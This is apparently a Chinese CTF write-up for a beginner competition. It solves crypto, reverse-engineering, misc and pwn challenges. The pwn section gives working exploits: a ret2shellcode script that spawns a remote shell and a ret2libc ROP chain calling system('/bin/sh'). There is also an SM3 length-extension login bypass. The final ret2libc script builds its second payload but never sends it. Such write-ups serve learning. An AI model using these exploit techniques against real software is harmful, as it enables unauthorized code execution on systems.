emojiCTF2024
看到一个新生赛,来打打,发现自己还是太菜了
连最正常的hash扩展一开始都没看出来,丢大脸
这次就巩固了一下hash扩展
密码其他的都是常规题了
其他方向基本不会,新生赛都打不了,(哭
crypto
签到
0111001001111010011000100111011101110110010100000100011101010011011110110011000101100111010111110101011000110101010111110100111001100001010111110011001101101110010001100110110001011111010100000110010101101100010000110011011100110000010111110100011000110001011101000110000101111101
二进制,然后rot13(凯撒移位13)
emojiCTF{1t_I5_An_3aSy_CryP70_S1gn}
r^s^a
具体原理可以看下面这篇文章
https://skatexu.github.io/2023/11/30/RSA-p-q/
简单来说,就是dfs剪枝
from Crypto.Util.number import *
from gmpy2 import *
leak= 89884656743115795386465259394234594567546130199363180708002290807487206865805972417279697354950018128772500146302322028511803484668179089220615193364070482772703954931838536681720469410883560665407216805250546708783249336389502139655454481491246187888957907623426449041503701395627092371546762192998918782974#p^q
e = 65537
n = 17626392212279375795672017937809976432819563702015014286064950438576962829301599887424832742209378051687822421703316130192020970941676594734073337248659576926575409659609517516571173738767919910420753227081676651612998092451924002173008602428197941864705971469948068681614565308570894501692597579202715649837935866803849514492857112054684416002104812289864567355883456430042148145799939586951625034025707736407538180102611049391900268512837878848560854682228074168583637013599117615137668041018375469762511166636852906124939919673060420023287056647653925858064479788117341253962554259945839612998710315288660915390543
c = 15353396223606692204253354833233067114199996528916790997604347786403456282543682138297916126293312135032558534636934734869807941321225203411903129720253717772393747501562673454929926513518070604475902448091242766771949079887693901769148980379739977262744450451505364499178273015141584500087580192421701748750836209109487246092666869218702274453456508100997255478700791800921353303116505094139865456937359493463506797519849430510917719026559539965791391845554621890357123251984800601113044355173099746170929775677870786702159862756844911828296490556988779325757045280115604388611000559427604324936039138667153453277427
sys.setrecursionlimit(3000) # 将默认的递归深度修改为3000
pq = []
leak_bits = 1024
xor = bin(leak)[2:].zfill(1024)
def pq_high_xor(p="", q=""):
lp, lq = len(p), len(q)
tp0 = int(p + (1024-lp) * "0", 2)
tq0 = int(q + (1024-lq) * "0", 2)
tp1 = int(p + (1024-lp) * "1", 2)
tq1 = int(q + (1024-lq) * "1", 2)
if tp0 * tq0 > n or tp1 * tq1 < n:
return
if lp == leak_bits:
pq.append(tp0)
return
if xor[lp] == "1":
pq_high_xor(p + "0", q + "1")
pq_high_xor(p + "1", q + "0")
else:
pq_high_xor(p + "0", q + "0")
pq_high_xor(p + "1", q + "1")
pq_high_xor()
p,q=pq
print(long_to_bytes(pow(c,invert(e,(p-1)*(q-1)),n)))
r-s-a
可以直接使用z3解方程
二元一次方程组
两个方程求解两个未知数
from Crypto.Util.number import *
import gmpy2
from z3 import *
p_q = 176751046732247000340100322233632210831863595869318322636324104657233592271174889686080505048607319763714434858488534038069936991700913480220337796686186650177030451521521718543706424565910760556643073167233033260053611954430292482988330560109801702800223641220178381885484500731389476062696098624135997425940
e = 88916503578477627401412805277894332868980624236569992063697914979989379442607225917552844164713881687438269754833993361129209742837893436958631139911962737803001877195136829885214249858218462488406516146610034661933045960474095402256908091051270295988260535096034389009832467091589297898591207001830384656852391194475904221869323418928851156027884458526527371002209787455591042024033016738947679080718291482744551287670961916519295491170664773502508177445573477863154370236118123229828913053689723684203958159877650562308942649870186666946038865675671976785097128441942423084423490699957714516362244208461148232519
c = 60222694936796651211282138429685051687665613952154338977040880956370091404246447675653540538077085899530086622995806340317550701791797855388361272678147094795113706385581730566094808068091281425918749013314205416098445628884250616805121842898526334753733043161523784721970599085444686600714230248460007236471712214268126024885874413806643929126086714885933896045552697364376129044704392033521278723428230560995101587150180237338181912464296584894367487500633462466038302414529833189531128873524001385544089142112427688066024389537220421896863383987591801321870435077092202372958395065811334113528934959935408133234
n = 169959034357771035553519619973233436470178955980211718249992145738633245013581365814709721798668878753980372800175047774870547864044739589016759407310499675799098446112063706066851432187108894749427419799187036996982851649636232204288065953626635584787136324296150830618145022690189175012084252721883627262808400566442984502232684728476135276021352459850242175162024039600489359020866103579007299872591053100191952006870300737079042198796138306713165351913629749694411461899146464110673749273199253942918621670675215534035132989416841800612454163047320253253315849155928078928985716094396358868395706664839249255709
p=Int('p')
q=Int('q')
s=Solver()
s.add(p-q==p_q)
s.add(p*q==n)
s.check()
s=s.model()
p=s[s.decls()[0]].as_long()
print(long_to_bytes(pow(c,gmpy2.invert(e,p-1),p)))
print(long_to_bytes(pow(c,gmpy2.invert(e,(p-1)*(n//p-1)),n)))
"""b'emojiCTF{bh9Zin7aQE3EytpbuYCWUR5L}'
b'emojiCTF{bh9Zin7aQE3EytpbuYCWUR5L}'"""
小小的e也很可爱的说^_^
原理:中国剩余定理
求解出来的是me
然后题目提示小e,简单开根爆破一下
from Crypto.Util.number import *
from sympy.ntheory.modular import crt
import gmpy2
n1 = 1427348132915680293691860904327371119259951310936767119782924246640609125982698311631155177666023561985751882125457714436088041687860590744877907038139237
c1 = 833648771842180454968402985204147125711586903510278182070415704320619415180724555690787245308062243848021112677550435840474051735138375047889860583447186
n2 = 4761683884979441961225060126551057199018053187163495215741566809541012469117786253909918188054666459676786034088079184217293778998772953325192403808806211
c2 = 2839575993403902619174174871800527778875578572991209642401183254907176916836511772042040713077249489568898089447103700039214688015821235892335787774943747
n3 = 4676820751716906833774261249178801540235102639871868908465251338652448355348587350814835359300930907197219344924581438767051048321172672906470937804788983
c3 = 1717696905538748950854642014347065952548537621802658677605265626301413433026792629745810375076133759334895153283935611138425181916479612436969301269661602
n4 = 10862904846204541462979758018068038564378663004093937014471540370615411860235906188785323501101062633816495227180400053208027320892078994937278154814056139
c4 = 7836215134872057813099532978329248508723932523646309383784589504143010465742594753073330468193482859997393349445464284466234720536159364060329493484723385
n5 = 3125525516576955650797300005531038929193867883712112320341774162516012158758330460635151510198602443542340490849757345531572408613021832533552827178163839
c5 = 1780968379118537153313508044441876204438534755228185390566905368421823881988667979665344603571554247642853091247306949490879754003358446291710096469521725
n6 = 7915119593736489971075327244557569660958603312736281088134042268582792728834031380150003343389182267175786000961177207314665463415228189117678002505151427
c6 = 3746767285406817660985184457377172578882772127752648377468435044299105824214600015252062969516609425254791243839958271706894073423393096136769051379517441
n7 = 5651883265804003739124716725464696385240846709555961057560676950248109395293629820027296465388195197040993155175025324046889479725043092666364913064887749
c7 = 5527524180924934105260230323438118596064727029714316950139992630468709531671581080137265236916964966575917842151725081595614698483488019356544313851171272
n8 = 8685677152933295606692205480796185498488765010355362382365736298497517949414065103148944811858863172989259402969854448127602630239495940138190100350694909
c8 = 43179410910455731695657636479850632735943070376674555595786779910714595267617943556555770387649629735109841841381036888990426825587463084671657801319667
n9 = 3472028952254844837074253527893217772020576210384356582735064607214557697451646230257178903106879004812187637083727120134379819218258784348936561554205153
c9 = 2953453096141440548341345459028814356776005942745236140844722744169888454855514687518357102373009422349691308426316539398004674294396289615094814591873690
n10 = 5200741352018184716796486754967180751851529517972721656931718154657380792894780400124969064044482321564056192708692851513870412904862696361958303661698731
c10 = 2715844823856211220258201024813560385254716102747457457582011104461943235419876430734989472657633133587286031537132467035942166434899815427885081730805475
n11 = 624241005710424143840494369444737726799496487235306654980888105614304352255228317120232875327520017484823729280293132103496438029581409710315292864944257
c11 = 390574980449637057627543905120707439554685749039841912120922433857222392382229767202125662010324968319480824620551427153171529449397120803739965134239598
n12 = 2397996298746991744539349460276450195588567470896485655777385369003422319275647454877683056170280692195993930534784478176360397621698791823992296932892617
c12 = 1208314571391224593599162877738730941109252802779722534014048795725700588892607236513975775921259483615193241796551823356618752273196681029864696532940924
n13 = 1080064161778170577674009614221688013965823626459455187882222816120846312326422736285707705836359627695866241885204472608728876778469652985121437177699469
c13 = 942612647805458866770381296609488202958427441228391266427403493495992850083725368404422111293124442674506274390775778281570876347845815337425985913624218
n14 = 453668727702290403008640141970352688083668519902583307680013332192869499058206301275500908426604131944003178599248821104083845365951073433711700227413833
c14 = 431378321993915540507250042899890161223590488630254442488494358070063800798482090365894513988564565817347843956767187579304872009665736986633901569970287
n15 = 3372615979429568408601904522848327405405078383406236339897200679953654718037792794444250895297051913234215691315964920688635158304174050810021790679981283
c15 = 736878426492278636124831457733817235035472565395214430633453494377095134710243979991273318259802394719412217894261302513986873738284999204534383307225231
n16 = 858734723693878780252448126363534320640481719950923740074387716293047440796628362323691453916529551668805073286050517175361666289135436349917054896762511
c16 = 333719185925524543782857098425598785527147028791243936515276885993216797315843589982699444417653747846553580026308344576391504076963028598483201806488900
n17 = 3952625226749508012580620574527110498026096777537830680201281131741462555415826933301340514056470967523928407308815562922049178926460013318218040902713869
c17 = 3377224284940085614645585348970730661395401315964041777814900185798560429744075400360963683111779960004785653463041554787219325338931767317120908218560877
n18 = 198158621043618245779149510969999591104681827743151458708702610131195651432512107345740364638163252559895591327070083670744374493168855723791682635869099
c18 = 32113533566647800344644419400213572263876772357375004816048948381335740343580370990402706971328820876804531600378236310424650810593308391510985161169426
n19 = 1791527022086060790490066593154187564281588030313373426399929220382551117955529541149063812388365960007418656626067609805495238579143133251596631025971419
c19 = 723914882812892239442876930788307277384285286663781044943537612842549192812804146394093114734340833808081905579690651430737624121820466833515056384390996
n20 = 325912296714787862225883011471921436697362343563269386597781882951322645921589784981775558863777617454252711667190195441557132614786913736306116034821469
c20 = 311068623926722220291032484597910658950903894385781265749104088560154327592774198383625307200798349363092362875583581558226598015028007216840478344738145
n21 = 8804477508997166428333790352988180468683821020019723045370494795843361480292423212264102406483745971019736138846802565745308319599516472122873703697347199
c21 = 2469354519693334101439302249421263089436342655041742565849909980834863282682974479928815131839393361014443299264519921496209510665223352489743603132168555
n_list=[n1,n2,n3,n4,n5]
c_list=[c1,c2,c3,c4,c5]
x=crt(n_list,c_list,check=True) #得到的是m**e
for e in range(64):
try:
m=long_to_bytes(gmpy2.iroot(x[0],e)[0])
if b'emoji' in m:
print(m)
print(e)
break
except:
pass
"""
b'emojiCTF{oRy0EHRK9b5flioE6FXPlIO8}'
7
"""
登陆系统
server.py
import socketserver
from gmssl import sm3, func
import os
from secret import flag
class LoginHandler(socketserver.BaseRequestHandler):
def handle(self):
salt = os.urandom(32)
salt_list = func.bytes_to_list(salt)
self.request.sendall(b"*********************\n")
self.request.sendall("登录系统\n".encode())
self.request.sendall(b"*********************\n")
self.request.sendall(b"salt_hash: " + sm3.sm3_hash(salt_list).encode('utf-8') + b"\n")
self.request.sendall("请输入登录的username:\n".encode())
name = self.request.recv(1024).strip()
if b"admin" not in name:
self.request.sendall("只允许admin\n".encode())
return
name_list = func.bytes_to_list(name)
finall_list = func.bytes_to_list(salt)
finall_list.extend(name_list)
finall_hash = sm3.sm3_hash(finall_list)
self.request.sendall("请输入salt+username的hash以验证登录\n".encode())
user_hash = self.request.recv(1024).strip().decode('utf-8')
if user_hash == finall_hash:
self.request.sendall("登录成功!\n".encode())
self.request.sendall(flag.encode('utf-8') + b"\n")
else:
self.request.sendall("登录失败!\n".encode())
if __name__ == "__main__":
HOST, PORT = "0.0.0.0", 8800
with socketserver.TCPServer((HOST, PORT), LoginHandler) as server:
print(f"Server started at {HOST}:{PORT}")
server.serve_forever()
一道关于sm3的题,跟hash有关,下面用hash代称
我们知道salt的hash值
然后要我们输入用户名
这边判断用户名只是if b"admin" not in name:
所以我们输入的时候保证里面有admin字符即可
然后对输入长度基本上是没有限制
最后判断salt+name的hash值是不是等于name的hash值
首先简单了解了一下sm3加密,基本跟md5类似
关键点就是,当明文长度大于512bit时,会将上一个512bit进行hash加密后的值当作下一个512bit的IV值
这时候我们只要将salt构造成hash加密前预处理填充时的状态,然后再添上我们想要输入的值,这里就是admin,将这一串进行普通的sm3加密,就是final_hash,final_hash的过程就是对admin前的512bit进行sm3加密,得到一个hash,就是salt_hash,然后再将salt_hash当作iv值对admin进行sm3加密。
这时候我们就可以用一开始得到的salt的hash值,直接对admin进行sm3加密,就是最后的结果.
具体原理我是参考这篇文章:
不知道为什么我一开始一直出错,甚至在gmssl的sm3源码里改都有错,最后还是找了一个脚本,利用了里面的SM3_len_ex_ak函数可以自定义IV
EXP
from pwn import *
from gmssl import sm3,func
from Crypto.Util.number import *
from length_extension_attack_for_SM3 import *
p=remote("emoji.dayi.ink",22670)
p.recvuntil(b'salt_hash: ')
salt_hash=p.recvline().decode()
name=b'\x80'+b'\x00'*29+b'\x01\x00admin'
p.sendline(name)
user_hash=SM3_len_ex_ak(1,salt_hash,"61646d696e")
p.sendline(user_hash.encode())
p.interactive()
reverse
re签到
直接ida打开照着伪代码写
exp
def crypto_init():
a1=[]
a2="woodpecker"
a3=10
for i in range(256):
a1.append(i)
v7=0
for i in range(256):
v7=(a1[i]+v7+ord(a2[i%a3]))%256
a1[i],a1[v7]=a1[v7],a1[i]
return a1
def decrypt_flag():
v4=crypto_init()
a1="904fc1ff4dc92eed7555acfcbbbfad161b8f6313bb8fc3602c8c7108de3f"
x=0
for i in range(0,len(a1),2):
enc=int(a1[i:i+2],16)
j=i//2+1
x=(x+v4[j])%256
v4[j],v4[x]=v4[x],v4[j]
print(chr((v4[(v4[j]+v4[x])%256])^enc),end="")
decrypt_flag()
#woodpecker{this_is_simple_rc4}
"""a1256=i
a1260=a1260+a1[i]
v5=a1[i]
a1[i]=a1260
a1[a1260]=v5
a3[i]=a1[(a1[i]+a1[a1260])&0b11111111]^a2[i]"""
lfsr
直接ida打开照着伪代码写
exp
result=[0x16,0x54,0xfd,0x29,0x5c,0x23,0xb1,0xa1,0x53,0xd4,0x3d,0x4f,0x2f,0xa6,0xf1,0x53,0xd2,0xec,0x41,0x82,0xee,0xd5,0x43,0x16,0xfc,0x2f,0x9e,0xe7,0x44,0x0,0x22,0x3c,0xb3,0xf2,0x50,0x82,0xbc,0xda,0x46,0xd8,0xea,0x93]
v7=0xace1
for i in result:
a=v7&1
v7=v7>>1
if a:
v7=(v7^0xb400)&0xffff
print(chr((i^v7)%256),end="")
#flag{08e1eec9-41c4-4585-aa94-4815112d60c7}
emoji的java兔子
有个mc题,正好玩玩
jeb打开转一下伪代码
这一步看是拿着胡萝卜右键泥土召唤滑稽兔并获得滑稽剑
之后就是满足一些条件?没咋看懂,就看中文大致理解一下。
我是把它关起来然后按住shift,一边看着它,一边跳
过一会把它杀了就出来了
杀完之后吓死我了,什么地狱绘图
misc
真签到
emojiCTF{S1gn_1n}
emoji
python运行一下
然后emoji解码
'''def emoji_to(emos):
list = []
for emo in emos:
code = ord(emo)
list.append(code)
return list
if __name__ == "__main__":
emos = []
converted = emo_to(emos)
print(converted)
ono
[128093, 128099, 128088, 128094, 128114, 128092, 128100, 128039, 128097, 128096, 128086, 128040, 128106, 128086, 128106, 128102, 128086, 128043, 128108, 128101, 128116]'''
enc=[128093, 128099, 128088, 128094, 128114, 128092, 128100, 128039, 128097, 128096, 128086, 128040, 128106, 128086, 128106, 128102, 128086, 128043, 128108, 128101, 128116]
for i in enc:
print(chr(i),end="")
#http://www.atoolbox.net/Tool.php?Id=937
#flag{em0ji_1s_so_4un}
ez_png
msb(最高位)
看图片左上角很明显出错了
修改最高位就会这样很明显
keyboard
参考教程
https://nnnpc.github.io/2024/04/16/USB/
tshark -r misc01.pcap -T fields -e usbhid.data > usbdata.txt
ubsdata.txt
0200000000000000
0000000000000000
0000090000000000
0000000000000000
00000f0000000000
0000000000000000
0000040000000000
0000000000000000
00000a0000000000
0000000000000000
0200000000000000
02002f0000000000
0200000000000000
0000000000000000
0000390000000000
0000000000000000
0000180000000000
0000000000000000
0000160000000000
0000000000000000
0000050000000000
0000000000000000
0000390000000000
0000000000000000
0200000000000000
02002d0000000000
0200000000000000
0000000000000000
0000100000000000
0000000000000000
00000c0000000000
00000c1600000000
0000160000000000
0000160600000000
0000060000000000
0000000000000000
0200000000000000
02002d0000000000
0200000000000000
0000000000000000
00000e0000000000
0000000000000000
0000080000000000
0000000000000000
00001c0000000000
0000000000000000
0000050000000000
0000000000000000
0000120000000000
0000000000000000
0000040000000000
0000000000000000
0000150000000000
0000000000000000
0000070000000000
0000000000000000
0200000000000000
02002d0000000000
0200000000000000
0000000000000000
0000390000000000
0000000000000000
0000390000000000
0000000000000000
0000170000000000
0000000000000000
0000080000000000
0000000000000000
0000160000000000
0000000000000000
0000170000000000
0000000000000000
00002a0000000000
0000000000000000
00002a0000000000
0000000000000000
00002a0000000000
0000000000000000
00002a0000000000
0000000000000000
0000090000000000
0000000000000000
00000f0000000000
0000040000000000
0000040a00000000
00000a0000000000
0000000000000000
0200000000000000
0200300000000000
0200000000000000
0000000000000000
exp
import os
normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i",
"0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r",
"16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1",
"1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0",
"28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[",
"30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/",
"39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
"40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I",
"0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R",
"16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!",
"1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
"28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{",
"30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?",
"39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
"40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
nums = []
keys = open('usbdata.txt')
for line in keys:
# print(line)
if len(line) != 17: # 首先过滤掉鼠标等其他设备的USB流量
continue
nums.append(line[0:2] + line[4:6]) # 取一、三字节
# print(nums)
keys.close()
output = ""
for n in nums:
if n[2:4] == "00":
continue
if n[2:4] in normalKeys:
if n[0:2] == "02": # 表示按下了shift
output += shiftKeys[n[2:4]]
else:
output += normalKeys[n[2:4]]
else:
output += '[unknown]'
print('output :' + output)
# output :flag{<CAP>usb<CAP>_miissc_keyboard_<CAP><CAP>test<DEL><DEL><DEL><DEL>flaag}
# flag{USB_misc_keyboard_flag}
pwn
emoji的签到题
正常的ret2shellcode
我是要设置环境才能成功:context(arch = "amd64")
from pwn import *
context(arch = "amd64")
p = remote('emoji.dayi.ink',22090)
shellcode = asm(shellcraft.sh())
p.sendline(shellcode.ljust(280, b'A') + p64(0x404080))
p.interactive()
#cat /flag
emoji的签到题
正常的ret2libc
64位,有libc
from pwn import *
context(arch = "amd64")
#p = remote('emoji.dayi.ink',22090)
p=process('./pwn')
p.sendline(str(int(0x664C2D98)).encode())
pop_rdi=0x4011df
puts_got=0x404018
puts_plt=0x401090
emoji=0x401221
payload=b'a'*(0xd0+8)
payload+=p64(pop_rdi)
payload+=p64(puts_got) #设置rdi寄存器的值为puts的got表地址
payload+=p64(puts_plt) #调用puts函数,输出的是puts的got表地址
payload+=p64(emoji) #设置返回地址,上述步骤完成了输出了puts函数的地址,我们得控制程序执行流
#让它返回到emoji函数,这样我们才可以再一次利用输入点构造rop
p.sendline(payload)
print(p.recvline())
print(p.recvline())
print(p.recvline())
puts_addr=u64(p.recvuntil(b'\n')[:-1].ljust(8,b'\0'))#接收程序返回的地址
#lijust(8,‘\0’),不满8位的用0补足
print(hex(puts_addr))
libc = ELF("./libc.so.6")
puts_base = puts_addr - libc.sym["puts"]
system_addr = puts_base + libc.sym["system"]
binsh_addr = puts_base + next(libc.search(b"/bin/sh"))
payload = b"a"*(0xd0+8)
payload += p64(0x40101a) #需要添加一个ret,仅仅用于栈平衡
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
p.interactive()